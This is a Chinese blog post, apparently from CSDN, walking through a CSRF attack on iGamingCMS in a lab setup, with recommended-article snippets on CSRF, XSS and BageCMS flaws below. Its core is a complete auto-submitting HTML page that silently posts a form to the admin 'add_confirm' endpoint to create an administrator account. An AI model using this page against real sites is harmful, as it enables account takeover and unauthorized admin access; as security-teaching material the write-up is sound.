iGamingCMS CSRF漏洞伪造POST添加管理员

最新推荐文章于 2024-07-23 20:30:10 发布
最新推荐文章于 2024-07-23 20:30:10 发布
阅读量1.3k 收藏 2
点赞数 1
分类专栏: CSRF 文章标签: CSRF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jpygx123/article/details/83011505
版权

正常打开页面:http://192.168.209.137/CSRF0/admin/users.php?do=add_user
在这里插入图片描述
这个网页使用request来接受信息的,所以可以接收GET也可以接收POST,通过burp抓提交的数据包得。
在这里插入图片描述
可以看到后面有一个do参数为add_confirm和我们之前的写表单的网址http://192.168.209.137/CSRF0/admin/users.php?do=add_user有相同的参数。那么说明提交的时候是在do=add_confirm里进行的,get方式直接拼接url即可。接下来构造POST请求。

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CSRF</title>
	<script>
	function abc(){
		var f=document.getElementById("test");
		f.getElementsByTagName("input")[0].value="user";
		f.getElementsByTagName("input")[1].value="pass";
		f.getElementsByTagName("input")[2].value="user";
		f.getElementsByTagName("input")[3].value="user";
		f.getElementsByTagName("input")[4].value="user";
		f.submit();
	}
</script>
</head>
<body onload="abc()">
    <form action="http://192.168.209.137/CSRF0/admin/users.php?do=add_confirm" id="test" method="POST">
        <input type="text" name="pseudo">
        <input type="text" name="email">
		<input type="text" name="fname">
        <input type="text" name="lname">
		<input type="text" name="password">
    </form>
</body>
</html>

成功添加。

花自飘零丶水自流
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
iGaming CMS-开源
05-15
iGaming CMS是专为游戏网站设计的内容管理系统。 它使用PHP和MySQL。
推荐40个专业的CMS下载
weixin_33798152的博客
06-16 1643
1. Joomla CMS (Recommend) Joomla is an award-winning content management system (CMS), which enables you to build Web sites and powerful online applications. Many aspects, including its ease-of-us...
【XSS漏洞】XSS攻击平台-窃取Cookie
最新发布
muyuchen110的博客
07-23 392
XSS漏洞基础:XSS 攻击全称跨站脚本攻击,是为不和层叠样式表(Cascading Style Sheets, CSS) 的缩写混淆,故将跨站脚本攻击缩写为 XSS,XSS 是⼀种在 web 应⽤中的计算机安全漏洞,它允许恶意web⽤户将代码植⼊到 web ⽹站⾥⾯,供给其它⽤户访问,当⽤户访问到有恶意代码的⽹⻚就会产⽣ xss 攻击;漏洞概念:⽬标未对⽤户从前端功能点输⼊的数据与输出的内容未进⾏处理或者处理不当,从⽽导致恶意的JS代码被执⾏造成窃取⽤户信息劫持WEB⾏为危害的。
CSRF跨站请求伪造漏洞原理及代码审计
11-05
课程声明:该课程是教学使用,视频内涉及漏洞利用方法,请勿在互联网环境中使用;维护互联网网络安全,人人有责。课程说明:课程为CISP-PTE子课程。实验所需环境:vmware;windows server一台;环境下载地址:实验环境下载地址在购买后单独发送课程主要解决问题:1、搞明白什么是,CSRFSRF能做什么事情?2、CSRF和XSS有什么区别?3、搞明白CSRF漏洞代码到底是什么样?逐行读代码让你看透CSRF。4、搞懂CSRF的防御方法。 如果有以上困惑赶紧学习吧,Margin老师工作日一般都是30分钟就能为你解答疑惑,沟通无延时、无障碍。
大数据技术之数据安全与网络安全——CMS靶场(文章管理系统)实训
未来社会二十年发展的核心技术趋势由ABCD四个字母组成,分别是AI(人工智能)、BlockChain(区块链)、Cloud(云)、和Data(大数据)每一次进步都有新的认知和感触
11-25 3701
数据与网络安全作为保障大数据系统正常运行的基石,同样备受关注。今天写博客时候发现自己很久没更新数据安全与网络安全方面的内容了,于是花了点时间写一篇CMS靶场实训博客。本文通过CMS靶场实训,深入分析CMS系统的安全漏洞,探讨防范措施,提供实战经验和攻防能力,有助于加强大数据与网络安全意识。
CSRF(客户端跨站请求伪造)---专篇
weixin_51519028的博客
09-17 1531
CSRF的一些知识
espcms csrf漏洞 导致任意管理员添加1
08-03
由于在管理员添加页面缺少了必要的CSRF防护令牌,攻击者可以构造恶意的HTML页面,诱导用户点击,从而执行添加管理员的操作。 **二、漏洞成因** CSRF漏洞通常发生在Web应用中,当一个受信任的用户在未完全退出登录...
hucart-含有CSRF漏洞的源码.zip
12-31
CSRF(Cross-Site Request Forgery,跨站请求伪造)是一种常见的网络安全问题,它允许攻击者在用户已登录的情况下,诱导用户浏览器执行非本意的操作。在这个案例中,"hucart-含有CSRF漏洞的源码.zip" 提供了一个实际...
CSRF漏洞的靶场实验
09-19
CSRF(Cross-Site Request Forgery,跨站请求伪造)是一种常见的网络安全漏洞,它允许攻击者在用户已登录且浏览器保持会话状态的情况下,诱使用户执行非本意的操作。在“CSRF漏洞的靶场实验”中,我们将通过实际操作...
CSRF漏洞详细说明
02-26
Cross-SiteRequestForgery(CSRF),中文一般译作跨站请求伪造。经常入选owasp漏洞列表Top10,在当前web漏洞排行中,与XSS和SQL注入并列前三。与前两者相比,CSRF相对来说受到的关注要小很多,但是危害却非常大。...
BageCMS(八哥CMS)v3.1.3.zip
07-06
BageCms是一款基于php5 mysql5开发的多功能开源的网站内容管理系统。使用高性能的PHP5的web应用程序开发框架YII构建,具有操作简单、稳定、安全、高效、跨平台等特点。采用MVC设计模式,模板定制方便灵活,内置小挂工具,方便制作各类功能和效果,BageCms可用于企业建站、个人博客、资讯门户、图片站等各类型站点。 BageCMS(八哥CMS)特点 1.开源免费 无论是个人还是企业展示型网站均可用本系统来完成 2.数据调用方便快捷 自主研发的数据调用模块,能快速调用各类型数据,方便建站 3.应用范围广 这套系统不是企业网站管理系统,也不是博客程序,更不是专业的图片管理系统,但它却具备大部分企业站、博客站、图片站的功能 4.安全高性能 基于高性能的PHP5的web应用程序开发框架YII构建具有稳定、安全、高效、跨平台等特点 5.URL自定义 系统支持自定义伪静态显示方式,良好的支持搜索引擎SEO。个性化设置每个栏目、内容的标题标签、描述标签、关键词标签 6.自定义数据模型 系统可自定义数据模型满足各种表示形式和字段需求 7.完善的后台权限控制 特有的管理员权限管理机制,可以灵活设置管理员的栏目管理权限、网站信息的添加、修改、删除权限等 BageCMS(八哥CMS)v3.1.3更新日志 此次更新仅做安全问题进行修正,未涉及到程序的功能升级。 BageCMS(八哥CMS)前台截图 BageCMS(八哥CMS)后台截图 后台地址:http://demo.bagecms.com/admini 用户:bagecms 密码:bagecms 相关阅读 同类推荐:站长常用源码 BageCMS安装教程:http://down.admin5.com/info/2013/0926/105491.html
bagecms V3.1.3 后台任意文件读取漏洞1
08-03
漏洞简介:BageCMS是一套基于PHP和MySQL的跨平台的内容管理系统(CMS)。管理功能过滤不严导致任意文件读取漏洞。##漏洞分析在文件 www\prot
bagecms漏洞测试版
03-06
包含漏洞的一套bagecms源码,比较适合用来做挖洞测试,有需要可以下载
CSRF跨站请求伪造攻击(附自动化工具实战某CMS
m0_51468027的博客
02-02 2955
一、CSRF介绍   CSRF全称为跨站请求伪造(Cross-site request forgery),是一种网络攻击方式,也被称为 one-click attack 或者 session riding。通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像xss漏洞,但是它与xss漏洞非常不同。xss利用站点内的信任用户,而CSRF则通过伪装成受信任用户请求受信任的网站。与xss攻击相比,csrf攻击往往不大流行,也难以防范,所以认为比xss漏洞更具危险性 二、CSRF漏洞原理   CS
CSRF漏洞
2ed
06-13 1501
CSRF是什么? CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF。 CSRF可以做什么? 你这可以这么理解CSRF攻击:攻击者盗用了你的身份,以你的名义发送恶意请求。CSRF能够做的事情包括:以你名义发送邮件,发消息,盗取你的账号,甚至于购买商品,...
BaiJiaCms 漏洞挖掘
huohaowen的博客
01-20 577
今天来和大家讲一下baijiacms漏洞挖掘,小编一般都是黑盒测试,没有对其代码审计,(等小编把常见的漏洞都了解一下在进行代码审计)
CSRF原理到CMS漏洞利用
未完成的歌~的博客
02-02 1492
文章目录0x01 基础知识:1、CSRF漏洞简介:2、与XSS的区别:3、攻击的细节:4、常见的攻击类型:4.1、GET类型的CSRF:4.2、POST类型的CSRF:0x02 CSRF漏洞检测:1、手动测试:2、使用CSRF检测工具:2.1、CSRFTester:2.2、BurpSuite:0x03 CSRF漏洞利用实例:1、MetInfo CMS:2、骑士CMS:0x04 如何防御CSRF攻击:1、验证HTTP Referer字段:2、添加Token,并验证:3、关键请求添加验证码:最后: 0x01 基
php开发cms漏洞,bagecms漏洞复现
weixin_30021053的博客
04-10 1425
BageCms是一款基于php5+mysql5开发的多功能开源的网站内容管理系统。bagecmsv3.1.3版本存在任意文件编辑漏洞,该漏洞没有对输入内容做过滤处理,所以可以直接新建或编辑PHP文件,从而获取webshell。1.实验环境: XAMPP集成环境。BagecmsV3.1.3版本2.后台地址; http://127.0.0.1/bagecms/upload/index.php?r=ad...
无防护CSRF漏洞利用详解-GET与POST
"该资源主要探讨了无防护的CSRF(Cross-Site Request Forgery,跨站请求伪造漏洞的利用方法,分为GET型和POST型两种情况。内容包括代码分析和实际利用示例,旨在帮助理解CSRF攻击的原理和防范措施。" **CSRF漏洞...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值